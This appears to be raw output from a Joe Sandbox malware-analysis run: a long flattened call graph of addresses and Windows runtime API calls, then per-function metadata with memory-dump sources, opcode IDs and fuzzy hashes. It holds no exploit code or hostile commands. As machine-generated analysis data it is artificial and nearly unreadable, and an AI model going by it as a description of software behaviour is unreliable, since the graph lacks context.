7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 76502->76504 76504->76498 76506 7ff73ae95deb 76505->76506 76507 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 76506->76507 76507->76498 76509 7ff73ae951e8 76508->76509 76510 7ff73ae951f9 76508->76510 76527 7ff73ae94ed0 76509->76527 76510->76474 76513 7ff73ae95198 76512->76513 76514 7ff73ae951ac 76512->76514 76515 7ff73ae94ed0 54 API calls 76513->76515 76514->76474 76515->76514 76518 7ff73ae9486e 76516->76518 76517 7ff73ae78da0 task 15 API calls 76519 7ff73ae949ac 76517->76519 76518->76517 76537 7ff73ae95790 15 API calls type_info::_name_internal_method 76519->76537 76521 7ff73ae94ad7 76521->76474 76522->76474 76523->76474 76524->76474 76525->76473 76526->76500 76528 7ff73ae94eec 76527->76528 76529 7ff73ae94e10 15 API calls 76528->76529 76535 7ff73ae94f06 memcpy_s 76528->76535 76529->76535 76530 7ff73ae94790 15 API calls 76530->76535 76531 7ff73ae95023 76532 7ff73ae95039 76531->76532 76533 7ff73ae94e10 15 API calls 76531->76533 76532->76510 76533->76532 76534 7ff73ae70690 _free_nolock 15 API calls 76534->76535 76535->76530 76535->76531 76535->76532 76535->76534 76536 7ff73ae74600 39 API calls 76535->76536 76536->76535 76537->76521 76539 7ff73ae6b3ed 76538->76539 76540 7ff73ae78484 76538->76540 76542 7ff73ae78420 76539->76542 76540->76539 76546 7ff73ae7a690 76540->76546 76543 7ff73ae78429 76542->76543 76544 7ff73ae6b3f7 76543->76544 76556 7ff73ae7a850 76543->76556 76544->76414 76547 7ff73ae7a707 76546->76547 76552 7ff73ae62f8a 76547->76552 76553 7ff73ae62fab 76552->76553 76554 7ff73ae80f90 strrchr 15 API calls 76553->76554 76555 7ff73ae62420 76554->76555 76557 7ff73ae7a888 76556->76557 76558 7ff73ae7a8bd 76557->76558 76559 7ff73ae7a9a3 wcsxfrm 76557->76559 76565 7ff73ae7d720 15 API calls 3 library calls 76558->76565 76560 7ff73ae7a99e 76559->76560 76562 7ff73ae7a690 15 API calls 76559->76562 76560->76543 76562->76560 76563 7ff73ae7a94c 76563->76560 76564 7ff73ae7a690 15 API calls 76563->76564 
76564->76560 76565->76563 76567 7ff73aeca9b7 76566->76567 76567->76567 76602 7ff73aeca900 76567->76602 76569 7ff73aecaa15 76606 7ff73ae837c0 76569->76606 76571 7ff73aecaa87 76609 7ff73aebaa20 76571->76609 76577 7ff73aecf750 5 API calls 76586 7ff73aecabb7 76577->76586 76578 7ff73aecb460 18 API calls 76578->76586 76579 7ff73aecf660 18 API calls 76579->76586 76585 7ff73aecaebf memcpy_s 76632 7ff73aecf750 76585->76632 76586->76577 76586->76578 76586->76579 76586->76585 76588 7ff73ae837c0 15 API calls 76586->76588 76618 7ff73aede3a0 76586->76618 76622 7ff73aece150 76586->76622 76628 7ff73aed21b0 76586->76628 76636 7ff73aede040 18 API calls 76586->76636 76637 7ff73aedcc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext RtlVirtualUnwind RaiseException 76586->76637 76638 7ff73aed04a0 18 API calls 76586->76638 76639 7ff73aedd4f0 18 API calls 2 library calls 76586->76639 76588->76586 76591 7ff73aecaff8 _handle_error 76591->76449 76593 7ff73ae85611 76592->76593 76594 7ff73aebaa90 16 API calls 76593->76594 76596 7ff73ae8583b 76594->76596 76595 7ff73ae8597e 76595->76451 76596->76595 76653 7ff73aedee70 15 API calls 2 library calls 76596->76653 76598 7ff73ae8589d 76598->76595 76599 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 76598->76599 76600 7ff73ae858e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76599->76600 76654 7ff73aedf070 73 API calls _wcsupr_s 76600->76654 76603 7ff73aeca926 76602->76603 76604 7ff73aeca930 76602->76604 76641 7ff73aee5d90 15 API calls _free_nolock 76603->76641 76604->76569 76607 7ff73ae78d00 _free_nolock 15 API calls 76606->76607 76608 7ff73ae8383b memcpy_s 76607->76608 76608->76571 76610 7ff73aebaa49 76609->76610 76611 7ff73aebaa3d 76609->76611 76613 7ff73aebaee0 16 API calls 76610->76613 76642 7ff73aebb0e0 76611->76642 76614 7ff73aebaa47 76613->76614 76615 7ff73aedc660 76614->76615 76645 7ff73aed2a10 18 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76615->76645 76617 7ff73aedc685 76617->76586 
76619 7ff73aede3e6 76618->76619 76621 7ff73aede5dd 76619->76621 76646 7ff73ae836b0 5 API calls 2 library calls 76619->76646 76621->76586 76625 7ff73aece16f 76622->76625 76623 7ff73aece273 76623->76586 76624 7ff73aece1e6 76624->76623 76627 7ff73aecb460 18 API calls 76624->76627 76625->76624 76647 7ff73aecb460 76625->76647 76627->76624 76630 7ff73aed21c8 type_info::_name_internal_method 76628->76630 76629 7ff73aed2291 76629->76586 76630->76629 76651 7ff73aece540 15 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76630->76651 76633 7ff73aecf775 76632->76633 76635 7ff73aecaf63 76632->76635 76633->76635 76652 7ff73ae836b0 5 API calls 2 library calls 76633->76652 76635->76591 76640 7ff73ae836b0 5 API calls 2 library calls 76635->76640 76636->76586 76637->76586 76638->76586 76639->76586 76640->76591 76641->76604 76643 7ff73aebaf50 7 API calls 76642->76643 76644 7ff73aebb13e 76643->76644 76644->76614 76645->76617 76646->76621 76648 7ff73aecb483 76647->76648 76649 7ff73aecb48d 76647->76649 76650 7ff73aecb410 18 API calls 76648->76650 76649->76625 76650->76649 76651->76630 76652->76635 76653->76598 76654->76595 76657 7ff73ae88b40 10 API calls 76655->76657 76656 7ff73ae86fda 76656->76424 76657->76656 76659 7ff73ae86f90 _mbsncpy_s 10 API calls 76658->76659 76660 7ff73ae8704b 76659->76660 76660->76256 76661->76262 76663->76273 76666 7ff73ae7f707 wcsxfrm 76664->76666 76667 7ff73ae7f81e 76666->76667 76670 7ff73ae7f727 wcsxfrm 76666->76670 76673 7ff73ae70a70 15 API calls 2 library calls 76667->76673 76669 7ff73ae7f7f0 wcsxfrm 76669->76180 76670->76669 76674 7ff73ae70950 15 API calls strrchr 76670->76674 76672->76183 76673->76669 76674->76669 76676 7ff73af2a9a4 76675->76676 76691 7ff73af2aa57 memcpy_s 76675->76691 76677 7ff73af2aa67 76676->76677 76679 7ff73af2a9bb 76676->76679 76683 7ff73af3ab1c _get_daylight 14 API calls 76677->76683 76677->76691 76678 7ff73af2aef8 _get_daylight 14 API calls 76680 7ff73ae65487 76678->76680 76697 7ff73af391ac EnterCriticalSection 
76679->76697 76693 7ff73ae6dd30 76680->76693 76684 7ff73af2aa83 76683->76684 76684->76691 76698 7ff73af3a290 76684->76698 76691->76678 76691->76680 76694 7ff73ae6dd6f wcsxfrm 76693->76694 76695 7ff73ae62f8a 15 API calls 76694->76695 76696 7ff73ae654b8 76695->76696 76696->76193 76699 7ff73af3a2db 76698->76699 76700 7ff73af3a29f wcsftime 76698->76700 76701 7ff73af2aef8 _get_daylight 14 API calls 76699->76701 76700->76699 76702 7ff73af3a2c2 HeapAlloc 76700->76702 76706 7ff73af4addc EnterCriticalSection LeaveCriticalSection wcsftime 76700->76706 76704 7ff73af3a2e0 76701->76704 76702->76700 76703 7ff73af3a2d9 76702->76703 76703->76704 76704->76691 76706->76700 76707->76200 76708->76202 76710->76084 76711->76089 76713 7ff73ae78d00 _free_nolock 15 API calls 76712->76713 76714 7ff73ae6ad2f 76713->76714 76714->75905 76716 7ff73ae70950 15 API calls strrchr 76714->76716 76715->75902 76716->75905 76718 7ff73ae73d67 76717->76718 76720 7ff73ae73cbf 76717->76720 76730 7ff73ae72320 15 API calls _free_nolock 76718->76730 76729 7ff73ae72320 15 API calls _free_nolock 76720->76729 76722 7ff73ae7310f 76722->75912 76722->75913 76725 7ff73ae84020 76723->76725 76724 7ff73ae63037 _mbsncpy_s 94 API calls 76724->76725 76725->76724 76726 7ff73ae84089 76725->76726 76726->75915 76727->75917 76728->75917 76729->76722 76730->76722 76731 7ff73ae64a97 76732 7ff73ae64aa7 76731->76732 76733 7ff73ae730a0 102 API calls 76732->76733 76734 7ff73ae64ac4 76733->76734 76735 7ff73af2ac60 76736 7ff73af2acc7 76735->76736 76737 7ff73af2ac7d GetModuleHandleW 76735->76737 76745 7ff73af2ab58 76736->76745 76737->76736 76743 7ff73af2ac8a 76737->76743 76740 7ff73af2ad09 76742 7ff73af2ad1b 76743->76736 76759 7ff73af2ad68 GetModuleHandleExW 76743->76759 76765 7ff73af391ac EnterCriticalSection 76745->76765 76747 7ff73af2ab74 76748 7ff73af2ab90 14 API calls 76747->76748 76749 7ff73af2ab7d 76748->76749 76750 7ff73af39200 _isindst LeaveCriticalSection 76749->76750 76751 7ff73af2ab85 76750->76751 76751->76740 76752 
7ff73af2ad1c 76751->76752 76766 7ff73af3d484 76752->76766 76755 7ff73af2ad56 76757 7ff73af2ad68 3 API calls 76755->76757 76756 7ff73af2ad45 GetCurrentProcess TerminateProcess 76756->76755 76758 7ff73af2ad5d ExitProcess 76757->76758 76760 7ff73af2adad 76759->76760 76761 7ff73af2ad8e GetProcAddress 76759->76761 76763 7ff73af2adb7 FreeLibrary 76760->76763 76764 7ff73af2adbd 76760->76764 76761->76760 76762 7ff73af2ada5 76761->76762 76762->76760 76763->76764 76764->76736 76767 7ff73af3d4a2 76766->76767 76768 7ff73af2ad29 76766->76768 76770 7ff73af39550 76767->76770 76768->76755 76768->76756 76773 7ff73af39378 76770->76773 76774 7ff73af393d9 76773->76774 76780 7ff73af393d4 try_get_function 76773->76780 76774->76768 76775 7ff73af394bc 76775->76774 76778 7ff73af394ca GetProcAddress 76775->76778 76776 7ff73af39408 LoadLibraryW 76777 7ff73af39429 GetLastError 76776->76777 76776->76780 76777->76780 76779 7ff73af394db 76778->76779 76779->76774 76780->76774 76780->76775 76780->76776 76781 7ff73af394a1 FreeLibrary 76780->76781 76782 7ff73af39463 LoadLibraryExW 76780->76782 76781->76780 76782->76780 76783 7ff73ae61cf0 76786 7ff73ae7ebc0 76783->76786 76787 7ff73ae7ebef 76786->76787 76792 7ff73ae7efd0 76787->76792 76789 7ff73ae61d19 76791 7ff73ae7ec11 76791->76789 76795 7ff73ae7edf0 76791->76795 76793 7ff73ae78da0 task 15 API calls 76792->76793 76794 7ff73ae7f001 76793->76794 76794->76791 76796 7ff73ae7ee1a 76795->76796 76797 7ff73ae78d00 _free_nolock 15 API calls 76796->76797 76798 7ff73ae7ee52 76796->76798 76797->76798 76798->76791 76799 7ff73af0d4e4 76824 7ff73af0d6a8 76799->76824 76802 7ff73af0d630 76852 7ff73af0d9d4 7 API calls 2 library calls 76802->76852 76803 7ff73af0d500 __scrt_acquire_startup_lock 76805 7ff73af0d63a 76803->76805 76806 7ff73af0d51e 76803->76806 76853 7ff73af0d9d4 7 API calls 2 library calls 76805->76853 76815 7ff73af0d53f __scrt_release_startup_lock 76806->76815 76832 7ff73af3675c 76806->76832 76809 7ff73af0d543 76810 7ff73af0d645 ExFilterRethrow 
_free_nolock 76811 7ff73af0d5c9 76837 7ff73af0db20 76811->76837 76813 7ff73af0d5ce 76840 7ff73af36688 76813->76840 76815->76809 76815->76811 76849 7ff73af2adf8 26 API calls 76815->76849 76821 7ff73af0d5f1 76821->76810 76851 7ff73af0d83c 7 API calls __scrt_initialize_crt 76821->76851 76823 7ff73af0d608 76823->76809 76854 7ff73af0dc9c 76824->76854 76827 7ff73af0d6d7 76856 7ff73af38760 76827->76856 76828 7ff73af0d4f8 76828->76802 76828->76803 76834 7ff73af3676f 76832->76834 76833 7ff73af3678c 76833->76815 76834->76833 77034 7ff73af11ae8 76834->77034 77046 7ff73af0d400 76834->77046 77132 7ff73af0e110 76837->77132 76841 7ff73af4695c 37 API calls 76840->76841 76842 7ff73af36697 76841->76842 76844 7ff73af0d5d6 76842->76844 77134 7ff73af46c94 26 API calls TranslateName 76842->77134 76845 7ff73ae650e0 76844->76845 76846 7ff73ae650fd 76845->76846 77135 7ff73ae66b70 76846->77135 76849->76811 76850 7ff73af0db64 GetModuleHandleW 76850->76821 76851->76823 76852->76805 76853->76810 76855 7ff73af0d6ca __scrt_dllmain_crt_thread_attach 76854->76855 76855->76827 76855->76828 76857 7ff73af4ad18 76856->76857 76858 7ff73af0d6dc 76857->76858 76862 7ff73af4695c 76857->76862 76868 7ff73af468a4 76857->76868 76858->76828 76861 7ff73af0f154 7 API calls 2 library calls 76858->76861 76861->76828 76863 7ff73af46969 76862->76863 76867 7ff73af469ae 76862->76867 76883 7ff73af3aa74 76863->76883 76867->76857 76869 7ff73af468c7 76868->76869 76870 7ff73af468d1 76869->76870 77033 7ff73af391ac EnterCriticalSection 76869->77033 76873 7ff73af46943 76870->76873 76875 7ff73af387cc ExFilterRethrow 26 API calls 76870->76875 76873->76857 76877 7ff73af4695b 76875->76877 76878 7ff73af469ae 76877->76878 76880 7ff73af3aa74 26 API calls 76877->76880 76878->76857 76881 7ff73af46998 76880->76881 76882 7ff73af466e4 37 API calls 76881->76882 76882->76878 76884 7ff73af3aa8a 76883->76884 76885 7ff73af3aa85 76883->76885 76891 7ff73af3aa92 76884->76891 76927 7ff73af39828 6 API calls try_get_function 76884->76927 76926 
7ff73af397e0 6 API calls try_get_function 76885->76926 76888 7ff73af3aaa9 76889 7ff73af3921c _wcsupr_s 14 API calls 76888->76889 76888->76891 76892 7ff73af3aabc 76889->76892 76896 7ff73af3ab0c 76891->76896 76934 7ff73af387cc 76891->76934 76894 7ff73af3aada 76892->76894 76895 7ff73af3aaca 76892->76895 76930 7ff73af39828 6 API calls try_get_function 76894->76930 76928 7ff73af39828 6 API calls try_get_function 76895->76928 76908 7ff73af466e4 76896->76908 76899 7ff73af3aad1 76929 7ff73af39294 14 API calls 2 library calls 76899->76929 76900 7ff73af3aae2 76901 7ff73af3aaf8 76900->76901 76902 7ff73af3aae6 76900->76902 76932 7ff73af3a750 14 API calls _get_daylight 76901->76932 76931 7ff73af39828 6 API calls try_get_function 76902->76931 76906 7ff73af3ab00 76933 7ff73af39294 14 API calls 2 library calls 76906->76933 76909 7ff73af468a4 37 API calls 76908->76909 76910 7ff73af4670d 76909->76910 76946 7ff73af463f0 76910->76946 76913 7ff73af46727 76913->76867 76914 7ff73af3a290 wcsftime 15 API calls 76917 7ff73af46738 76914->76917 76915 7ff73af467d3 76962 7ff73af39294 14 API calls 2 library calls 76915->76962 76917->76915 76953 7ff73af469d8 76917->76953 76919 7ff73af467c7 76920 7ff73af467ce 76919->76920 76923 7ff73af467f3 76919->76923 76921 7ff73af2aef8 _get_daylight 14 API calls 76920->76921 76921->76915 76922 7ff73af46830 76922->76915 76964 7ff73af46234 23 API calls 5 library calls 76922->76964 76923->76922 76963 7ff73af39294 14 API calls 2 library calls 76923->76963 76927->76888 76928->76899 76929->76891 76930->76900 76931->76899 76932->76906 76933->76891 76943 7ff73af2a6c0 EnterCriticalSection LeaveCriticalSection ExFilterRethrow 76934->76943 76936 7ff73af387d5 76937 7ff73af387e4 76936->76937 76944 7ff73af2a710 26 API calls 5 library calls 76936->76944 76939 7ff73af387ed IsProcessorFeaturePresent 76937->76939 76941 7ff73af38817 ExFilterRethrow 76937->76941 76940 7ff73af387fc 76939->76940 76945 7ff73af38900 6 API calls 3 library calls 76940->76945 76943->76936 76944->76937 
76945->76941 76947 7ff73af13ea8 TranslateName 26 API calls 76946->76947 76948 7ff73af46404 76947->76948 76949 7ff73af46422 76948->76949 76950 7ff73af46410 GetOEMCP 76948->76950 76951 7ff73af46437 76949->76951 76952 7ff73af46427 GetACP 76949->76952 76950->76951 76951->76913 76951->76914 76952->76951 76954 7ff73af463f0 28 API calls 76953->76954 76955 7ff73af46a03 76954->76955 76956 7ff73af46a40 IsValidCodePage 76955->76956 76957 7ff73af46a83 memcpy_s _handle_error 76955->76957 76956->76957 76958 7ff73af46a51 76956->76958 76957->76919 76959 7ff73af46a88 GetCPInfo 76958->76959 76961 7ff73af46a5a memcpy_s 76958->76961 76959->76957 76959->76961 76965 7ff73af46500 76961->76965 76962->76913 76963->76922 76964->76915 76966 7ff73af4653d GetCPInfo 76965->76966 76968 7ff73af46633 _handle_error 76965->76968 76967 7ff73af46550 76966->76967 76966->76968 76974 7ff73af492ec 76967->76974 76968->76957 76970 7ff73af465c7 76987 7ff73af4e6ec 76970->76987 76973 7ff73af4e6ec 31 API calls 76973->76968 76975 7ff73af13ea8 TranslateName 26 API calls 76974->76975 76976 7ff73af4932e 76975->76976 76992 7ff73af42ff4 76976->76992 76978 7ff73af4936b _handle_error 76978->76970 76979 7ff73af49364 76979->76978 76980 7ff73af3a290 wcsftime 15 API calls 76979->76980 76982 7ff73af49390 memcpy_s wcsftime 76979->76982 76980->76982 76981 7ff73af49428 76981->76978 76984 7ff73af39294 __free_lconv_mon 14 API calls 76981->76984 76982->76981 76983 7ff73af42ff4 wcsftime MultiByteToWideChar 76982->76983 76985 7ff73af4940a 76983->76985 76984->76978 76985->76981 76986 7ff73af4940e GetStringTypeW 76985->76986 76986->76981 76988 7ff73af13ea8 TranslateName 26 API calls 76987->76988 76989 7ff73af4e711 76988->76989 76995 7ff73af4e3d4 76989->76995 76991 7ff73af465fa 76991->76973 76993 7ff73af42ffc MultiByteToWideChar 76992->76993 76996 7ff73af4e416 76995->76996 76997 7ff73af42ff4 wcsftime MultiByteToWideChar 76996->76997 76999 7ff73af4e460 76997->76999 76998 7ff73af4e69f _handle_error 76998->76991 76999->76998 77000 
7ff73af3a290 wcsftime 15 API calls 76999->77000 77002 7ff73af4e493 wcsftime 76999->77002 77000->77002 77001 7ff73af42ff4 wcsftime MultiByteToWideChar 77003 7ff73af4e505 77001->77003 77002->77001 77004 7ff73af4e597 77002->77004 77003->77004 77021 7ff73af39bf4 77003->77021 77004->76998 77031 7ff73af39294 14 API calls 2 library calls 77004->77031 77008 7ff73af4e554 77008->77004 77011 7ff73af39bf4 __crtLCMapStringW 7 API calls 77008->77011 77009 7ff73af4e5a6 77010 7ff73af3a290 wcsftime 15 API calls 77009->77010 77013 7ff73af4e5c0 wcsftime 77009->77013 77010->77013 77011->77004 77012 7ff73af39bf4 __crtLCMapStringW 7 API calls 77016 7ff73af4e641 77012->77016 77013->77004 77013->77012 77014 7ff73af4e676 77014->77004 77030 7ff73af39294 14 API calls 2 library calls 77014->77030 77016->77014 77029 7ff73af43050 WideCharToMultiByte 77016->77029 77022 7ff73af39378 try_get_function 5 API calls 77021->77022 77023 7ff73af39c32 77022->77023 77024 7ff73af39c89 77023->77024 77025 7ff73af39c37 LCMapStringEx 77023->77025 77032 7ff73af39cd0 5 API calls 2 library calls 77024->77032 77026 7ff73af39cbb 77025->77026 77026->77004 77026->77008 77026->77009 77028 7ff73af39c93 LCMapStringW 77028->77026 77030->77004 77031->76998 77032->77028 77035 7ff73af11b12 77034->77035 77036 7ff73af3921c _wcsupr_s 14 API calls 77035->77036 77037 7ff73af11b31 77036->77037 77063 7ff73af39294 14 API calls 2 library calls 77037->77063 77039 7ff73af11b3f 77040 7ff73af3921c _wcsupr_s 14 API calls 77039->77040 77044 7ff73af11b69 77039->77044 77041 7ff73af11b5b 77040->77041 77064 7ff73af39294 14 API calls 2 library calls 77041->77064 77045 7ff73af11b72 77044->77045 77065 7ff73af39ac8 6 API calls try_get_function 77044->77065 77045->76834 77047 7ff73af0d410 77046->77047 77066 7ff73af367cc 77047->77066 77049 7ff73af0d41c 77072 7ff73af0d6f4 77049->77072 77052 7ff73af0d434 _RTC_Initialize 77061 7ff73af0d489 77052->77061 77077 7ff73af0d8a4 77052->77077 77053 7ff73af0d4b5 77053->76834 77055 7ff73af0d449 77080 7ff73af35f54 
77055->77080 77059 7ff73af0d45e 77060 7ff73af36e98 26 API calls 77059->77060 77060->77061 77062 7ff73af0d4a5 77061->77062 77114 7ff73af0d9d4 7 API calls 2 library calls 77061->77114 77062->76834 77063->77039 77064->77044 77065->77044 77067 7ff73af367dd 77066->77067 77068 7ff73af2aef8 _get_daylight 14 API calls 77067->77068 77069 7ff73af367e5 77067->77069 77070 7ff73af367f4 77068->77070 77069->77049 77115 7ff73af38b14 23 API calls _invalid_parameter_noinfo 77070->77115 77073 7ff73af0d705 77072->77073 77076 7ff73af0d70a __scrt_release_startup_lock 77072->77076 77073->77076 77116 7ff73af0d9d4 7 API calls 2 library calls 77073->77116 77075 7ff73af0d77e 77076->77052 77117 7ff73af0d868 77077->77117 77079 7ff73af0d8ad 77079->77055 77081 7ff73af0d455 77080->77081 77082 7ff73af35f74 77080->77082 77081->77061 77113 7ff73af0d97c InitializeSListHead 77081->77113 77083 7ff73af35f7c 77082->77083 77084 7ff73af35f92 77082->77084 77085 7ff73af2aef8 _get_daylight 14 API calls 77083->77085 77086 7ff73af4695c 37 API calls 77084->77086 77087 7ff73af35f81 77085->77087 77088 7ff73af35f97 77086->77088 77122 7ff73af38b14 23 API calls _invalid_parameter_noinfo 77087->77122 77123 7ff73af46114 30 API calls 4 library calls 77088->77123 77091 7ff73af35fae 77124 7ff73af35d34 26 API calls 77091->77124 77093 7ff73af35feb 77125 7ff73af35ef4 14 API calls 2 library calls 77093->77125 77095 7ff73af36001 77096 7ff73af36009 77095->77096 77097 7ff73af36021 77095->77097 77098 7ff73af2aef8 _get_daylight 14 API calls 77096->77098 77127 7ff73af35d34 26 API calls 77097->77127 77100 7ff73af3600e 77098->77100 77126 7ff73af39294 14 API calls 2 library calls 77100->77126 77102 7ff73af36043 77131 7ff73af39294 14 API calls 2 library calls 77102->77131 77103 7ff73af3601c 77103->77081 77104 7ff73af3603d 77104->77102 77106 7ff73af36088 77104->77106 77107 7ff73af3606f 77104->77107 77130 7ff73af39294 14 API calls 2 library calls 77106->77130 77128 7ff73af39294 14 API calls 2 library calls 77107->77128 77109 7ff73af36078 
77129 7ff73af39294 14 API calls 2 library calls 77109->77129 77112 7ff73af36084 77112->77081 77114->77053 77115->77069 77116->77075 77118 7ff73af0d882 77117->77118 77120 7ff73af0d87b 77117->77120 77121 7ff73af385ec 26 API calls 77118->77121 77120->77079 77121->77120 77122->77081 77123->77091 77124->77093 77125->77095 77126->77103 77127->77104 77128->77109 77129->77112 77130->77102 77131->77081 77133 7ff73af0db37 GetStartupInfoW 77132->77133 77133->76813 77134->76842 77136 7ff73ae66b92 77135->77136 77148 7ff73ae74a00 77136->77148 77139 7ff73ae66bee 77161 7ff73ae65250 60 API calls _wcsupr_s 77139->77161 77140 7ff73ae66c01 77151 7ff73ae6de20 77140->77151 77144 7ff73ae65300 75 API calls 77145 7ff73ae66c3d 77144->77145 77154 7ff73ae6a810 77145->77154 77147 7ff73ae65116 77147->76850 77162 7ff73ae6a530 77148->77162 77150 7ff73ae66be1 77150->77139 77150->77140 77152 7ff73ae63037 _mbsncpy_s 94 API calls 77151->77152 77153 7ff73ae66c2b 77152->77153 77153->77144 77203 7ff73ae8e2c0 77154->77203 77156 7ff73ae63037 _mbsncpy_s 94 API calls 77158 7ff73ae6a842 77156->77158 77157 7ff73ae6a937 77159 7ff73ae6b260 6 API calls 77157->77159 77158->77156 77158->77157 77160 7ff73ae6a965 77159->77160 77160->77147 77161->77147 77171 7ff73ae86950 77162->77171 77164 7ff73ae6a559 77166 7ff73ae6a55d _handle_error 77164->77166 77167 7ff73ae6a57c memcpy_s 77164->77167 77175 7ff73ae88930 77164->77175 77166->77150 77167->77166 77168 7ff73ae63037 _mbsncpy_s 94 API calls 77167->77168 77169 7ff73ae6a7cb 77168->77169 77169->77166 77178 7ff73ae6b260 77169->77178 77172 7ff73ae86963 LoadLibraryExA 77171->77172 77174 7ff73ae86982 Concurrency::details::_UnrealizedChore::_CancelViaToken 77171->77174 77173 7ff73ae86986 GetProcAddressForCaller 77172->77173 77172->77174 77173->77174 77174->77164 77176 7ff73ae88bb0 3 API calls 77175->77176 77177 7ff73ae8894c memcpy_s 77176->77177 77177->77167 77179 7ff73ae6b28a 77178->77179 77186 7ff73ae83ed0 77179->77186 77181 7ff73ae6b29e 77189 7ff73ae827e0 77181->77189 77183 
7ff73ae6b2a8 77185 7ff73ae6b39c 77183->77185 77193 7ff73ae88ad0 77183->77193 77185->77166 77197 7ff73aeba990 77186->77197 77188 7ff73ae83ef3 77188->77181 77190 7ff73ae82802 77189->77190 77192 7ff73ae8280c 77189->77192 77202 7ff73aeb7300 VirtualFree 77190->77202 77192->77183 77194 7ff73ae88af3 77193->77194 77195 7ff73ae88b35 77194->77195 77196 7ff73ae88c90 4 API calls 77194->77196 77195->77185 77196->77194 77198 7ff73aeba9ca 77197->77198 77199 7ff73aebaa0d 77198->77199 77201 7ff73aebada0 VirtualFree 77198->77201 77199->77188 77201->77198 77202->77192 77204 7ff73ae8e2f6 77203->77204 77205 7ff73ae8e33e 77203->77205 77209 7ff73ae8e6e0 WaitForSingleObject DeleteCriticalSection 77204->77209 77205->77158 77207 7ff73ae8e300 77210 7ff73ae83bb0 74 API calls 3 library calls 77207->77210 77209->77207 77210->77205 77211 7ff73ae64a01 77212 7ff73ae64a0c 77211->77212 77213 7ff73ae64a30 77211->77213 77212->77213 77215 7ff73ae72dc0 77212->77215 77216 7ff73af2aef8 _get_daylight 14 API calls 77215->77216 77217 7ff73ae72dd3 GetLastError 77216->77217 77218 7ff73ae72e77 77217->77218 77219 7ff73ae72ee6 77218->77219 77220 7ff73ae83fc0 94 API calls 77218->77220 77221 7ff73ae72f35 wcsxfrm 77219->77221 77229 7ff73ae73a80 19 API calls _handle_error 77219->77229 77220->77219 77227 7ff73ae73005 77221->77227 77230 7ff73ae73a80 19 API calls _handle_error 77221->77230 77222 7ff73ae73074 77224 7ff73af2aef8 _get_daylight 14 API calls 77222->77224 77225 7ff73ae73079 SetLastError 77224->77225 77225->77213 77227->77222 77231 7ff73ae73a80 19 API calls _handle_error 77227->77231 77229->77221 77230->77227 77231->77222 77232 7ff73ae61a21 77235 7ff73ae7fd90 77232->77235 77234 7ff73ae61a47 77237 7ff73ae7fdb8 77235->77237 77236 7ff73ae7ff71 strrchr _mbsncpy_s 77236->77234 77237->77236 77238 7ff73ae7feb0 wcsxfrm 77237->77238 77242 7ff73ae802a6 77237->77242 77255 7ff73ae7f2a0 77237->77255 77259 7ff73ae7f2f0 77237->77259 77263 7ff73ae70950 15 API calls strrchr 77237->77263 77238->77236 77262 7ff73ae70a70 15 API 
calls 2 library calls 77238->77262 77243 7ff73ae802fd 77242->77243 77244 7ff73ae802b7 77242->77244 77247 7ff73ae8037d 77243->77247 77251 7ff73ae80333 77243->77251 77264 7ff73ae9e9c0 15 API calls 77244->77264 77248 7ff73ae80396 77247->77248 77249 7ff73ae80383 77247->77249 77267 7ff73aeb2fe0 15 API calls type_info::_name_internal_method 77248->77267 77266 7ff73ae91a40 15 API calls 2 library calls 77249->77266 77250 7ff73ae802f8 77250->77234 77265 7ff73ae9e9c0 15 API calls 77251->77265 77256 7ff73ae7f2d5 77255->77256 77257 7ff73ae7f2c7 77255->77257 77256->77237 77268 7ff73ae9e3f0 15 API calls 3 library calls 77257->77268 77260 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 77259->77260 77261 7ff73ae7f32a 77260->77261 77261->77237 77262->77236 77263->77237 77264->77250 77265->77250 77266->77250 77267->77250 77268->77256

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                      • String ID:
                                                      • API String ID: 1330151763-0
                                                      • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                      • Instruction ID: 70534de4fc876353f1611dd9d54a63cd4a4389e0c42a2d0eb3fd458fc1b6d6ae
                                                      • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                      • Instruction Fuzzy Hash: 24C1D03BB24A5295FB14EF69C4816ACB761FB48B98B900375DE2E97794CF38E052D310
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
